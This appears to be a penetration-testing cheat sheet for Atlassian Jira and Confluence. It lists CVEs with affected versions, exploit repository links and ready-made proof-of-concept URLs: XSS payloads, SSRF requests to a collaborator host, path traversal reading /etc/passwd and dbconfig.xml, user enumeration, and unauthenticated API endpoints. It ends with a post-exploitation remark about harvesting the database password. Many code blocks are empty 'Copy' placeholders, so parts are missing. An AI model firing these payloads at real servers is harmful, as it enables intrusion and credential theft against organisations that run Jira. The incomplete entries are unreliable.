Jira

Exploits

Unauth LFR: https://github.com/xhs-d/CVE-2023-26256

Unauth get groups: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2022/CVE-2022-39960.yaml

Auth bypass 2 RCE: https://github.com/Pear1y/CVE-2022-0540-RCE

Unauth LFR: https://github.com/ColdFusionX/CVE-2021-26086


Check Privileges

Privileges Required: None POC:

Copy

https://<JIRA>/rest/api/2/mypermissions
https://<JIRA>/rest/api/3/mypermissions

Registration

Privileges Required: None POC:

Copy

https://<JIRA>/servicedesk/customer/user/signup
https://<JIRA>/jira/projects #Sign in button

POC:

Copy


XSS

CVE-2018-5230

Version: < 7.6.6, 7.7.0 <= x < 7.7.4, 7.8.0 <= x < 7.8.4, 7.9.0 <= x < 7.9.2 (Jira version) CVSS 3.x: 6.1 MEDIUM AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Privileges Required: None POC: https://<JIRA>/pages/%3CIFRAME%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E.vm

CVE-2018-20824

Version: < 7.13.1 (Jira version) CVSS 3.x: 6.1 MEDIUM AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Privileges Required: None POC: https://<JIRA>/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)

CVE-2019-3402

Version: < 7.13.1, 8.0.0 <= x < 8.1.1 (Jira version) CVSS 3.x: 6.1 MEDIUM AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Privileges Required: None POC: https://<JIRA>/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search

CVE-2019-8444

Version: 7.7 <= x < 7.13.6, 8.0.0 <= x < 8.3.2 (Jira version) CVSS 3.x: 5.4 MEDIUM AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N Privileges Required: Low POC:

Copy

CVE-2021-26078

Version: < 8.5.14, 8.6.0 <= x < 8.13.6, 8.14.0 <= x < 8.16.1 (Jira version) CVSS 3.x: 6.1 MEDIUM AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Privileges Required: None POC: https://www.exploit-db.com/exploits/50068

CVE-2007-0885

Version: ??? (Rainbow with the Zen (Rainbow.Zen) extension) CVSS 2.x: 6.8 MEDIUM AV:N/AC:M/Au:N/C:P/I:P/A:P Privileges Required: None POC: https://<JIRA>/jira/secure/BrowseProject.jspa?id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e

CVE-2020-9344

Version: < 8.8.2 (Jira Subversion ALM for Enterprise) CVSS 2.x: 6.1 MEDIUM AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Privileges Required: None POC:

Copy


SSRF

CVE-2017-9506

Version: 1.3.0 <= x < 1.9.12, 2.0.0 <= x < 2.0.4 (The IconUriServlet of the Atlassian OAuth Plugin version) CVSS 3.x: 6.1 MEDIUM AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Privileges Required: None Explanation: This vulnerability allows remote attackers to access the content of internal network resources and/or perform an XSS attack via Server Side Request Forgery POC: https://<JIRA>/plugins/servlet/oauth/users/icon-uri?consumerUri=https://colaborator

CVE-2019-8451

Version: < 8.4.0 (Jira version) CVSS 3.x: 6.5 MEDIUM AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N Privileges Required: None POC: https://<JIRA>/plugins/servlet/gadgets/makeRequest?url=https://<host_name>:[email protected]

CVE-2022-26135

Version: 8.0.0 <= x < 8.13.22, 8.14.0 <= x < 8.20.10, 8.21.0 <= x < 8.22.4 (Jira version) Version: 4.0.0 <= x < 4.13.22, 4.14.0 <= x < 8.20.10, 4.21.0 <= x < 4.22.4 (Jira Management Server and Data Center version) CVSS 3.x: 6.5 MEDIUM AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N Privileges Required: Low POC:

Copy


Path Traversal / File Read / File Include

CVE-2019-3396

Version: < 6.6.12, 6.7.0 <= x < 6.12.3, 6.13.0 <= x < 6.13.3, 6.14.0 <= x < 6.14.2 (The Widget Connector macro in Atlassian Confluence Server) CVSS 3.x: 9.8 CRITICAL AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Privileges Required: None POC:

Copy

CVE-2020-29453

Version: < 8.5.11, 8.6.0 <= x < 8.13.3, 8.14.0 <= x < 8.15.0 (Jira version) CVSS 3.x: 5.3 MEDIUM AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N Privileges Required: None POC: https://<JIRA>/s/1xqVb9EKKmXG4pzui1gHeg0yrna/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml

CVE-2021-26086

Version: < 8.5.14, 8.6.0 <= x < 8.13.6, 8.14.0 <= x < 8.16.1 (Jira version) CVSS 3.x: 5.3 MEDIUM AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N Privileges Required: None POC:

Copy

CVE-2019-8442

Version: < 7.13.4, 8.0.0 <= x < 8.0.4, 8.1.0 <= x < 8.1.1 (Jira version) CVSS 3.x: 7.5 HIGH AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N Privileges Required: None POC: /s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml

CVE-2021-26085

Version: < 7.4.10, 7.5.0 <= x < 7.12.3 (Jira version) CVSS 3.x: 5.3 MEDIUM AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N Privileges Required: None POC: https://github.com/ColdFusionX/CVE-2021-26085

CVE-2021–26086

Version: < 8.5.14, 8.6.0 <= x < 8.13.6, 8.14.0 <= x < 8.16.1 (Jira version) CVSS 3.x: 5.3 MEDIUM AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N Privileges Required: None POC:

Copy

CVE-2023-26255

Version: < 2.0.52 ("STAGIL Navigation for Jira - Menu & Themes" plugin) CVSS 3.x: 7.5 HIGH AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N Privileges Required: None POC: https://<JIRA>/plugins/servlet/snjCustomDesignConfig?fileName=../dbconfig.xmlpasswd&fileMime=$textMime

CVE-2023-26256

Version: < 2.0.52 ("STAGIL Navigation for Jira - Menu & Themes" plugin) CVSS 3.x: 7.5 HIGH AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N Privileges Required: None POC: https://<JIRA>/plugins/servlet/snjFooterNavigationConfig?fileName=../../../../etc/passwd&fileMime=$textMime


User Enumeration

CVE-2019-3403

Version: < 7.13.3, 8.0.0 <= x < 8.0.4, 8.1.0 <= x < 8.1.1 (Jira version) CVSS 3.x: 5.3 MEDIUM AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N Privileges Required: None POC: https://<JIRA>/rest/api/2/user/picker?query=<user_name_here>

CVE-2020-14181

Version: < 7.13.6, 8.0.0 <= x < 8.5.7, 8.6.0 <= x < 8.12.0 (Jira version) CVSS 3.x: 5.3 MEDIUM AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N Privileges Required: None POC: https://<JIRA>/secure/ViewUserHover.jspa?username=<uname>

CVE-2020-36289

Version: < 8.15.13, 8.6.0 <= x < 8.13.5, 8.14.0 <= x < 8.15.1 (Jira version) CVSS 3.x: 5.3 MEDIUM AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N Privileges Required: None POC: https://<JIRA>/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin

CVE-2021-39127

Version: < 8.5.10, 8.6.0 <= x < 8.13.1 (Jira version) CVSS 3.x: 5.3 MEDIUM AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N Privileges Required: None Explanation: There are other things which can be enumerated and extracted via JQL, not only usernames!!! POC: https://<JIRA>/secure/QueryComponent!Jql.jspa?jql=creator=<username>

CVE-2019-8446

Version: < 8.3.2 (Jira version) CVSS 3.x: 5.3 MEDIUM AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N Privileges Required: None POC:

Copy

POC:

Copy


Sensitive Information Disclosure

CVE-2020-14179

Version: < 8.5.8, 8.6.0 <= x < 8.11.1 (Jira version) CVSS 3.x: 5.3 MEDIUM AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N Privileges Required: None POC: https://<JIRA>/secure/QueryComponent!Default.jspa

Unauthenticated Popular Filters

Privileges Required: None POC:

Copy

Unauthenticated Dashboards

Privileges Required: None POC: https://<JIRA>/rest/api/2/dashboard?maxResults=100

Resolution

Privileges Required: None POC: https://<JIRA>/rest/api/2/resolution

Admin Project Dashboard Accessible

Privileges Required: None POC: https://<JIRA>/rest/menu/latest/admin

Project Group Found

Privileges Required: None POC: https://<JIRA>/rest/api/2/projectCategory?maxResults=100

CVE-2020-36287

Version: < 8.13.5, 8.14.0 <= x < 8.15.1 (Jira version) CVSS 3.x: 5.3 MEDIUM AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N Privileges Required: None POC:

Copy

POC: https://github.com/f4rber/CVE-2020-36287

Jira Unauthenticated Access to screens

Privileges Required: None POC: https://<JIRA>/rest/api/2/screens

Atlassian Connect Descriptor

Privileges Required: None POC: https://<JIRA>/atlassian-connect.json

Jira Unauthenticated Installed gadgets

Privileges Required: None POC: https://<JIRA>/rest/config/1.0/directory


User Information Disclosure

CVE-2019-8449

Version: < 8.4.0 (Jira version) CVSS 3.x: 5.3 MEDIUM AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N Privileges Required: None POC: https://<JIRA>/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true

via UserPickerBrowser

Privileges Required: Low, but sometimes can be None Explanation: It is a complete list of every user’s username and email address. There are three standard user groups in Jira: Administrators, Jira Users, and Anyone. For one reason or another, an administrator may grant the ‘Anyone’ group access to this functionality. This grants anyone access to the function – even anonymous users. POC: https://<JIRA>/secure/popups/UserPickerBrowser.jspa


SSTI

CVE-2019-11581

Version: 4.4.0 <= x < 7.6.14, 7.7.0 <= x < 7.13.5, 8.0.0 <= x < 8.0.3, 8.1.0 <= x < 8.1.2, 8.2.0 <= x < 8.2.3 (Jira version) CVSS 3.x: 9.8 CRITICAL AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Privileges Required: None POC:

Copy

CVE-2021-39115

Version: < 4.13.9, 4.14.0 <= x < 4.18.0 (Jira Service Management Server and Data Center versions) CVSS 3.x: 7.2 HIGH AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H Privileges Required: High POC: https://github.com/PetrusViet/CVE-2021-39115

CVE-2021-43947

Version: < 8.13.15, 8.14.0 <= x < 8.20.3 (Jira version) CVSS 3.x: 7.2 HIGH AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H Privileges Required: High Explanation: It is same CVE as CVE-2021-39115, but with patch bypass Article: https://mp.weixin.qq.com/s?__biz=Mzk0NTU5Mjg0Ng==&mid=2247491370&idx=1&sn=38fcc8290467b597c06d46455a1f0120&source=41#wechat_redirect


RCE

CVE-2021-26084

Version: < 6.13.23, 6.14.0 <= x < 7.4.11, 7.5.0 <= x < 7.11.6, 7.12.0 <= x < 7.12.5 (Confluence Server and Data Center versions) CVSS 3.x: 9.8 CRITICAL AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Privileges Required: None POC:

Copy

CVE-2022-0540

Version: < 8.13.18, 8.14.0 <= x < 8.20.6, 8.21.0 <= x < 8.22.0 (Jira version) Version: < 4.13.18, 4.14.0 <= x < 4.20.6, 4.21.0 <= x < 4.22.0 (Jira Service Management Server and Data Center) CVSS 3.x: 9.8 CRITICAL AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Privileges Required: None POC:

Copy

CVE-2024-21683

Version: 5.2, 7.19.0, 7.20.0, 8.0.0, 8.1.0, 8.2.0, 8.3.0, 8.4.0, 8.5.0, 8.6.0, 8.8.0, 8.7.1, 8.9.0 (Confluence Server and Data Center versions) CVSS 3.x: 7.2 HIGH AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H Privileges Required: High POC:

Copy

CVE-2022-1471

Version: https://confluence.atlassian.com/security/cve-2022-1471-snakeyaml-library-rce-vulnerability-in-multiple-products-1296171009.html CVSS 3.x: 9.8 CRITICAL AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Privileges Required: None POC:

Copy

CVE-2022-26134

Version:

Copy

CVSS 3.x: 9.8 CRITICAL AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Privileges Required: None POC: https://github.com/hev0x/CVE-2022-26134


Project Key Enumeration

CVE-2020-14178

Version: < 7.13.7, 8.0.0 <= x < 8.5.8, 8.6.0 <= x < 8.12.0 (Jira version) CVSS 3.x: 7.5 HIGH AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N Privileges Required: None POC:

Copy


Interesting Routes

Administrative and System Endpoints

  1. /secure/admin/

    • /secure/admin/ViewSystemInfo.jspa: System information page.

    • /secure/admin/WebSudoAuthenticate.jspa: WebSudo (admin re-authentication) page.

    • /secure/admin/AttachFile.jspa: File attachment for administrative tasks.

  2. /plugins/servlet/

    • /plugins/servlet/gadgets/dashboard: Gadgets dashboard.

    • /plugins/servlet/streams: Activity streams.

    • /plugins/servlet/oauth: OAuth endpoints.

    • /plugins/servlet/applinks/auth: Application links authentication.

  3. /rest/api/2/

    • /rest/api/2/user: User information and management.

    • /rest/api/2/group: Group management.

    • /rest/api/2/project: Project management.

    • /rest/api/2/configuration: Configuration settings.

    • /rest/api/2/search: Advanced search capabilities.

  4. /rest/servicedeskapi/

    • /rest/servicedeskapi/servicedesk: Service desk information.

    • /rest/servicedeskapi/request: Customer request management.

    • /rest/servicedeskapi/organization: Organization management.

    • /rest/servicedeskapi/queue: Service desk queues.

    • /rest/servicedeskapi/customer: Customer information.

  5. /secure/

    • /secure/CommentAssignIssue!default.jspa: Assign issues and comment.

    • /secure/DeleteComment!default.jspa: Delete comments.

    • /secure/EditIssue!default.jspa: Edit issues.

    • /secure/ManageFilters.jspa: Manage filters.

  6. /rest/plugins/1.0/

    • /rest/plugins/1.0/available: Available plugins.

    • /rest/plugins/1.0/com.atlassian.jira.plugins.jira-development-integration-plugin-key: Plugin-specific endpoints.

Specific Administrative Files

Copy

General API Endpoints

Copy

Workflow and Permissions

Copy

Additional Security-Sensitive Endpoints

Copy

Projects

/jira/projects

Documentation

Copy


Improper Authorization

CVE-2023-22518

Version: All versions are affected (Confluence Data Center and Server) CVSS 3.x: 9.8 CRITICAL AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Privileges Required: None POC:

Copy

CVE-2023-22515

Version: 8.0.0, 8.0.1, 8.0.2, 8.0.3, 8.0.4, 8.1.0, 8.1.1, 8.1.3, 8.1.4, 8.2.0, 8.2.1, 8.2.2, 8.2.3, 8.3.0, 8.3.1, 8.3.2, 8.4.0, 8.4.1, 8.4.2, 8.5.0, 8.5.1 (Confluence Data Center and Confluence Server) CVSS 3.x: 9.8 CRITICAL AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Privileges Required: None POC:

Copy

CVE-2022-26138

Version: 2.7.34, 2.7.35, and 3.0.2 (The Atlassian Questions For Confluence app for Confluence Server and Data Center) CVSS 3.x: 9.8 CRITICAL AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Privileges Required: None POC:

Copy

CVE-2019-20101

Version: < 8.13.3, 8.14.0 <= x < 8.14.1 (Jira version) CVSS 3.x: 5.3 MEDIUM AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N Privileges Required: None POC:

Copy

Atlassian JIRA Setup - Installer

Privileges Required: None POC: https://<JIRA>/secure/SetupMode!default.jspa

CVE-2019-8446

Version: < 8.3.2 (Jira version) CVSS 3.x: 5.3 MEDIUM AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N Privileges Required: None POC:

Copy

CVE-2022-39960

Version: < 1.0.3 (Jira Netic Group Export add-on) CVSS 3.x: 5.3 MEDIUM AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N Privileges Required: None POC:

Copy


Other

Jira Login Check

Copy

Atlassian Crowd Login Panel

https://<JIRA>/crowd/console/login.action

Jira Rest API Server Information

https://<JIRA>/rest/api/latest/serverInfo

Jira Service Desk Login Panel

Copy


Tools

Copy

Post-Exploit

dbconfig.xmlpasswd contains database password

Last updated